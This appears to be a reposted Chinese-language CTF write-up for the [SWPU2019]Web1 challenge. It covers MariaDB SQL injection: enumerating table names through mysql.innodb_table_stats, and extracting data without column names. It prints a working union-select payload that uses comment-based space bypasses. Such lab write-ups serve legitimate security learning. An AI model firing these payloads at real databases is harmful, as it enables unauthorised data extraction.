刷題記錄：[SWPU2019]Web1

知識點

MariaDB的SQL注入

https://mariadb.com/kb/en/mysqlinnodb_table_stats/
mysql.innodb_table_stats用於報表名
select group_concat(table_name) from mysql.innodb_table_stats

將列轉換成行，無列名注入

-1'union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
select group_concat(b) from(select 1 as b,2,3,4 union select*from diner)x

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 刷題記錄：[CISCN2019 華北賽區 Day2 Web1]Hack World BUU-[SWPU2019]ReverseMe 刷題記錄：[EIS 2019]EzPOP 刷題記錄：[ByteCTF 2019]EZCMS 刷題記錄：[GWCTF 2019]你的名字 BUUCTF刷題記錄(Web方面) ZJOI2019一輪停課刷題記錄刷題記錄：[FBCTF2019]Products Manager 刷題記錄：[DDCTF 2019]homebrew event loop Buuctf-misc-[SWPU2019]神奇的二維碼(binwalk morse2ascii)